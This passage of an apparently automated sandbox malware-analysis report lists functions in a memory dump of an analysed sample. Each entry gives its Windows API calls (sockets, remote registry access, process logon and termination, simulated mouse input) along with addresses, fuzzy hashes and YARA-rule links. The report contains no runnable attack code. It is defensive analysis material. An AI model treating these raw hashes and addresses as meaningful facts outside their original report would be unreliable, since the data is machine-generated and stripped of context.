GetClientRect.USER32 ref: 009C1F74
GetWindowRect.USER32 ref: 009C1F8D

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: cd148247b5e4842d0b7dff20c8820b0dba96204ffd6b05738193a254a7bdc8d1
Instruction ID: 845a22ba3a3445a93ddbb5f7fe406af210f392f2cc7a8bd172f23619dc035171
Opcode Fuzzy Hash: cd148247b5e4842d0b7dff20c8820b0dba96204ffd6b05738193a254a7bdc8d1
Instruction Fuzzy Hash: B1B15C7990024ADBDF10CFA8C480BEEB7B5FF09310F14952AED59DB252DB34A950CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00A36E17, Relevance: 9.2, APIs: 6, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00A36F14
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00A36F35
WSAGetLastError.WSOCK32(00000000), ref: 00A36F48
htons.WSOCK32(?,?,00000000,?,00000000), ref: 00A36FFE
inet_ntoa.WSOCK32(?), ref: 00A36FBB

Part of subcall function 00A1AE14: _strlen.LIBCMT ref: 00A1AE1E

_strlen.LIBCMT ref: 00A37058

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: _strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 1050922162-0
Opcode ID: c82fcc20d0c94793d76766f0bab775a58ec8095a6fe451ef2d9e27eab17191f2
Instruction ID: 28498f57f2ba4811db78dbb10104f34a8c3a6e41bd3374844cab71bdc7e58e61
Opcode Fuzzy Hash: c82fcc20d0c94793d76766f0bab775a58ec8095a6fe451ef2d9e27eab17191f2
Instruction Fuzzy Hash: 2381FD71908300AFC724EB24CC86F6FB7A9AFC5714F10891CF5569B2A2DA70ED04CB92

Uniqueness

Uniqueness Score: -1.00%

Function 009F99F2, Relevance: 9.2, APIs: 6, Instructions: 168memoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 009F1B11: SetFilePointerEx.KERNEL32(00000000,00000108,00A4FB84,?,00000004,00000001,00000001,?,?,?,009EDC91,?,00000000,00000000,00000002,00000001), ref: 009F1B48
Part of subcall function 009F1B11: GetLastError.KERNEL32(?,009EDC91,?,00000000,00000000,00000002,00000001,00000001,00000001), ref: 009F1B52

GetProcessHeap.KERNEL32(00000008,00001000,?,?,?,?,?,00A4FB24,00000401,00000109,?,?,009F8499,00A4FB24,0000000C,00000080), ref: 009F9A5B
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00A4FB24,00000401,00000109,?,?,009F8499,00A4FB24,0000000C,00000080), ref: 009F9A62
GetProcessHeap.KERNEL32(00000000,00A4FB24,?,?,?,?,?,?,?,?,00A4FB24,00000401,00000109,?,?,009F8499), ref: 009F9B04
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00A4FB24,00000401,00000109,?,?,009F8499,00A4FB24), ref: 009F9B0B
SetEndOfFile.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00A4FB24,00000401,00000109,?,?,009F8499), ref: 009F9B41
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00A4FB24,00000401,00000109,?,?,009F8499,00A4FB24), ref: 009F9B71

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$ErrorFileLastProcess$AllocFreePointer
String ID:
API String ID: 1354853467-0
Opcode ID: c4dbe9dfb0bd30c3fa61241fabfdfe0633bce096c0a8c2673a0f8e3f19cca0e3
Instruction ID: 3a49cd9fb6607642ea5ff09f037c84652e138436305180b677b086ffda5ab086
Opcode Fuzzy Hash: c4dbe9dfb0bd30c3fa61241fabfdfe0633bce096c0a8c2673a0f8e3f19cca0e3
Instruction Fuzzy Hash: BF41267290011CAEDB256BFC9C46BBE7B78EF82331F240715F729E21D1E635894187A1

Uniqueness

Uniqueness Score: -1.00%

Function 00A4046F, Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A410A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A40038,?,?), ref: 00A410BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A40548
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A40588
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00A405AB
RegEnumValueW.ADVAPI32 ref: 00A405D4
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00A40617
RegCloseKey.ADVAPI32(00000000), ref: 00A40624

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 3451389628-0
Opcode ID: 6ad16344a08abc46119a964cd474f9ee3dc106f5c7201800ea4b9dfe34e4f0a8
Instruction ID: 8b19baa82cffd7ba96392ca708e79011bca65e1b7ff53861c0b47e58114a1df1
Opcode Fuzzy Hash: 6ad16344a08abc46119a964cd474f9ee3dc106f5c7201800ea4b9dfe34e4f0a8
Instruction Fuzzy Hash: C7515835508240AFCB10EB64C985E6BBBE8FFC9314F04891DF586872A1DB71E945DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00A45A20, Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32 ref: 00A45A82
GetMenuItemCount.USER32(00000000), ref: 00A45AB9
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00A45AE1
GetMenuItemID.USER32(?,?), ref: 00A45B50
GetSubMenu.USER32(?,?), ref: 00A45B5E
PostMessageW.USER32 ref: 00A45BAF

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: e1df2ea3bed03acc2f99f07107520e7e5fd335b2b1d8b4474e39e29eece9f6b6
Instruction ID: b91c3ad5cfac4810cc3c48328d48a6545a32a140d018bb3faf5ca440b6037756
Opcode Fuzzy Hash: e1df2ea3bed03acc2f99f07107520e7e5fd335b2b1d8b4474e39e29eece9f6b6
Instruction Fuzzy Hash: EA518F39E00625EFCF15EFA5C945AAEB7B4EF88310F104469E805BB352DB71AE41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 009C1765, Relevance: 9.1, APIs: 6, Instructions: 116COMMON

Download Yara Rule

APIs

Part of subcall function 009C2612: GetWindowLongW.USER32 ref: 009C2623

BeginPaint.USER32(?,?,?,?,?,?), ref: 009C179A
GetWindowRect.USER32 ref: 009C17FE
ScreenToClient.USER32 ref: 009C181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 009C182C
EndPaint.USER32(?,?), ref: 009C1876

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 71a9989c36266f01fc715d381475f38be92583120d1a52f2f798c82d03aa5c94
Instruction ID: d4f2d0eee8e855e08eb4c3d6c2dfc4afd842b32906fca4ee60c18dabecae1d89
Opcode Fuzzy Hash: 71a9989c36266f01fc715d381475f38be92583120d1a52f2f798c82d03aa5c94
Instruction Fuzzy Hash: 2141A175604244AFE710DF64CC84FBA7BF8EB8A724F04066DF698861A2C7319846DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00A4B958, Relevance: 9.1, APIs: 6, Instructions: 112windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00A867B0,00000000,013B9698,?,?,00A867B0,?,00A4B862,?,?), ref: 00A4B9CC
EnableWindow.USER32(?,00000000), ref: 00A4B9F0
ShowWindow.USER32(00A867B0,00000000,013B9698,?,?,00A867B0,?,00A4B862,?,?), ref: 00A4BA50
ShowWindow.USER32(?,00000004,?,00A4B862,?,?), ref: 00A4BA62
EnableWindow.USER32(?,00000001), ref: 00A4BA86
SendMessageW.USER32(?,0000130C,?,00000000), ref: 00A4BAA9

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: c5c3bc966f0868db970c740878c5538374484deb16037deb08964112e1c6cc72
Instruction ID: 8ca7a6b76219911bf0ba538cb4aeac291851cf13aa4dc52caea7373542cf0522
Opcode Fuzzy Hash: c5c3bc966f0868db970c740878c5538374484deb16037deb08964112e1c6cc72
Instruction Fuzzy Hash: 4B416438610141AFDB21CF54D989B957BE0FB86354F1841B9FA488F6A3C732E846CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A27368, Relevance: 9.1, APIs: 6, Instructions: 105fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00A2737F
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00A273B6
EnterCriticalSection.KERNEL32(?), ref: 00A273D2
LeaveCriticalSection.KERNEL32(?), ref: 00A2744C
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00A27461
InterlockedExchange.KERNEL32(?,000001F6), ref: 00A27480

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: 291867568fd55a7251d79bf132bc31881292875ab540c8bf75da5858985abbd6
Instruction ID: 3f843c4f2b5473969af57e40059973e1f7242231c9fa397164c933ab30f282d3
Opcode Fuzzy Hash: 291867568fd55a7251d79bf132bc31881292875ab540c8bf75da5858985abbd6
Instruction Fuzzy Hash: 0D31AD76904105EFDB10EF99DC85AAFBB78FF85310B1041B6F904AA246DB319E51CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A373B1, Relevance: 9.1, APIs: 6, Instructions: 100COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00A35134,?,?,00000000,00000001), ref: 00A373BF

Part of subcall function 00A33C94: GetWindowRect.USER32 ref: 00A33CA7

GetDesktopWindow.USER32 ref: 00A373E9
GetWindowRect.USER32 ref: 00A373F0
mouse_event.USER32 ref: 00A37422

Part of subcall function 00A254E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A2555E

GetCursorPos.USER32(?), ref: 00A3744E
mouse_event.USER32 ref: 00A374AC

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: b1b117346efab9b3925e1eccbc00f8e15c6f1f72e068a1dab0e6ca84300dff52
Instruction ID: d247571ffadd98ab374fdcbe8d93d2bc4435f9c6328e26ea059e74e64792bd8d
Opcode Fuzzy Hash: b1b117346efab9b3925e1eccbc00f8e15c6f1f72e068a1dab0e6ca84300dff52
Instruction Fuzzy Hash: BF31C176508315AFD720DF54D849EAFBBA9FB89314F000929F58996091C631E909CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00A18D5B, Relevance: 9.1, APIs: 6, Instructions: 71memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A185F1: GetTokenInformation.ADVAPI32(00000000,00000002,00000000,00000000,?,00000000,00000000,00000000,?,00A18D7D,00000000,?,?,00000000,00000000), ref: 00A18608
Part of subcall function 00A185F1: GetLastError.KERNEL32(?,00A18D7D,00000000,?,?,00000000,00000000,?,?,?,00A18977,?,00000001), ref: 00A18612
Part of subcall function 00A185F1: GetProcessHeap.KERNEL32(00000008,?,?,00A18D7D,00000000,?,?,00000000,00000000,?,?,?,00A18977,?,00000001), ref: 00A18621
Part of subcall function 00A185F1: HeapAlloc.KERNEL32(00000000,?,00A18D7D,00000000,?,?,00000000,00000000,?,?,?,00A18977,?,00000001), ref: 00A18628
Part of subcall function 00A185F1: GetTokenInformation.ADVAPI32(00000000,00000002,00000000,?,?,?,00A18D7D,00000000,?,?,00000000,00000000,?,?,?,00A18977), ref: 00A1863E

GetLengthSid.ADVAPI32(?,00000000,?,?,?,00A18977,?,00000001), ref: 00A18DAC
GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00A18977,?,00000001), ref: 00A18DB8
HeapAlloc.KERNEL32(00000000,?,?,?,00A18977,?,00000001), ref: 00A18DBF
CopySid.ADVAPI32(00000000,00000000,?,?,?,?,00A18977,?,00000001), ref: 00A18DD8
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00A18977,?,00000001), ref: 00A18DEC
HeapFree.KERNEL32(00000000,?,?,?,00A18977,?,00000001), ref: 00A18DF3

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 10b50ccd237295577c50419596cacd42d6eac55f96746bc039e8eb538de6ce35
Instruction ID: 9520a2e733a37138e2b22c52608aeee18ae934be672d205bb35f72582e61ef4d
Opcode Fuzzy Hash: 10b50ccd237295577c50419596cacd42d6eac55f96746bc039e8eb538de6ce35
Instruction Fuzzy Hash: B211DC3A601604FFDB10CBA8EC49BFE7BB9EF82356F104129F44597150DB3A9981CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00A18AF9, Relevance: 9.1, APIs: 6, Instructions: 69processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004,?,?,00000000,?,?,00A3FCD2,?,?,?,?,?,?,?,?), ref: 00A18B2A
OpenProcessToken.ADVAPI32(00000000,?,?,00A3FCD2,?,?,?,?,?,?,?,?,?,?), ref: 00A18B31
CreateEnvironmentBlock.USERENV(?,00000004,00000001,?,?,00A3FCD2,?,?,?,?,?,?,?,?,?,?), ref: 00A18B40
CloseHandle.KERNEL32(00000004,?,?,00A3FCD2,?,?,?,?,?,?,?,?,?,?), ref: 00A18B4B
CreateProcessWithLogonW.ADVAPI32(00000001,00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00A18B7A
DestroyEnvironmentBlock.USERENV(00000000,?,?,00A3FCD2,?,?,?,?,?,?,?,?,?,?), ref: 00A18B8E

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 15b1d0f0de04c28f7ba9e7ab3a340584e97405197d9b29804d630b456befef9c
Instruction ID: 4d073b593698b85ac5b28c9cc6e31983aa439dafccb45606dfd3cddbb6fe549b
Opcode Fuzzy Hash: 15b1d0f0de04c28f7ba9e7ab3a340584e97405197d9b29804d630b456befef9c
Instruction Fuzzy Hash: 2C114ABA105109AFEB11CF94ED49FEE7BADEB86358F045025FA04A1060C67A8D619B60

Uniqueness

Uniqueness Score: -1.00%

Function 00A1BC53, Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00A1BC78
GetDeviceCaps.GDI32(00000000,00000058), ref: 00A1BC89
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A1BC90
ReleaseDC.USER32 ref: 00A1BC98
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00A1BCAF
MulDiv.KERNEL32(000009EC,?,00000008), ref: 00A1BCC1

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: f19a2918c4734dd637b5af7e31c558582a6165a67f5c3ed5aaf7dc3af35d36f3
Instruction ID: fb212d726ccace8945df1c6353d4a1b67bdb35a21a079f9fea14dc359a22d486
Opcode Fuzzy Hash: f19a2918c4734dd637b5af7e31c558582a6165a67f5c3ed5aaf7dc3af35d36f3
Instruction Fuzzy Hash: B601AC79A00208BFEB109BE59D45EAFBF7CDB89361F004066F604A7250D6325C01CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A4C19A, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 009C12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 009C134D
Part of subcall function 009C12F3: SelectObject.GDI32(?,00000000), ref: 009C135C
Part of subcall function 009C12F3: BeginPath.GDI32(?), ref: 009C1373
Part of subcall function 009C12F3: SelectObject.GDI32(?,00000000), ref: 009C139C

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00A4C1C4
LineTo.GDI32(00000000,00000003,?), ref: 00A4C1D8
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00A4C1E6
LineTo.GDI32(00000000,00000000,?), ref: 00A4C1F6
EndPath.GDI32(00000000), ref: 00A4C206
StrokePath.GDI32(00000000), ref: 00A4C216

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 34caea8d09b4c197ad16b88ba5318284e12f535518529137d2dcf74b0545e789
Instruction ID: d9e6a23f6622a3fcd74cb63bf814a42c5a5a35d73e611d412f18bfb66434da8f
Opcode Fuzzy Hash: 34caea8d09b4c197ad16b88ba5318284e12f535518529137d2dcf74b0545e789
Instruction Fuzzy Hash: B711097A40014CBFEB119F94DC88FEA7FADEB49364F048021BA184A161D7B29D56DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A2568B, Relevance: 9.0, APIs: 6, Instructions: 46windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32 ref: 00A2569B
SendMessageTimeoutW.USER32 ref: 00A256B1
GetWindowThreadProcessId.USER32(?,?), ref: 00A256C0
OpenProcess.KERNEL32(001F0FFF,?,?,?,?,?,00000010,?,?,00000002,000001F4,?,?,00000010), ref: 00A256CF
TerminateProcess.KERNEL32(00000000,?,?,?,?,?,?,00000010,?,?,00000002,000001F4,?,?,00000010), ref: 00A256D9
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000010,?,?,00000002,000001F4,?,?,00000010), ref: 00A256E0

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 10bfd60090d1410901825dece858d5f2efacd3bc6fa71a30f272e565a9f55fe3
Instruction ID: ea903fac748bdaddd0a46be472a2bdd6e976d8b4fd9e99570cd1a115b2bb2796
Opcode Fuzzy Hash: 10bfd60090d1410901825dece858d5f2efacd3bc6fa71a30f272e565a9f55fe3
Instruction Fuzzy Hash: B8F0307A245198BFE6219BE6EC0EEEF7F7CEBC7B62F001129F20490051D7621602C6B5

Uniqueness

Uniqueness Score: -1.00%

Function 009E03A2, Relevance: 9.0, APIs: 6, Instructions: 45keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B), ref: 009E03D3
MapVirtualKeyW.USER32(00000010), ref: 009E03DB
MapVirtualKeyW.USER32(000000A0), ref: 009E03E6
MapVirtualKeyW.USER32(000000A1), ref: 009E03F1
MapVirtualKeyW.USER32(00000011), ref: 009E03F9
MapVirtualKeyW.USER32(00000012), ref: 009E0401

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: d68b5e330ace5296cf4080a0429d5317dd8291fc7bdf407bc9d11515a4d353cf
Instruction ID: ca226e8afdfa3557e78a3fd09bff7e981de3f381eb82c0e552f8317f2164194e
Opcode Fuzzy Hash: d68b5e330ace5296cf4080a0429d5317dd8291fc7bdf407bc9d11515a4d353cf
Instruction Fuzzy Hash: 9E016CB090675A7DE3008F6A8C85B57FFA8FF45354F00421BE15C47941C3B5A864CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00A274D2, Relevance: 9.0, APIs: 6, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00A274E5
EnterCriticalSection.KERNEL32(?,?,009D1044,?,?), ref: 00A274F6
TerminateThread.KERNEL32(00000000,000001F6,?,009D1044,?,?), ref: 00A27503
WaitForSingleObject.KERNEL32(00000000,000003E8,?,009D1044,?,?), ref: 00A27510

Part of subcall function 00A26ED7: CloseHandle.KERNEL32(00000000,?,00A2751D,?,009D1044,?,?), ref: 00A26EE1

InterlockedExchange.KERNEL32(?,000001F6), ref: 00A27523
LeaveCriticalSection.KERNEL32(?,?,009D1044,?,?), ref: 00A2752A

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: b436afb9ee3baed0b502bdcef2e99560a985f6cd0f4db67feb31b76376b028f6
Instruction ID: e2572c97f5da55eb4e2c74e9fa55eb1f72e54ba85e0097e9e4bdee12d3fc6964
Opcode Fuzzy Hash: b436afb9ee3baed0b502bdcef2e99560a985f6cd0f4db67feb31b76376b028f6
Instruction Fuzzy Hash: 75F05E7E044A22EFE7116BA8FD4C9DB7B79EF86712B101531F202900B0CBB75502CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A18E74, Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A18E7F
UnloadUserProfile.USERENV(?,?), ref: 00A18E8B
CloseHandle.KERNEL32(?), ref: 00A18E94
CloseHandle.KERNEL32(?), ref: 00A18E9C
GetProcessHeap.KERNEL32(00000000,?), ref: 00A18EA5
HeapFree.KERNEL32(00000000), ref: 00A18EAC

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
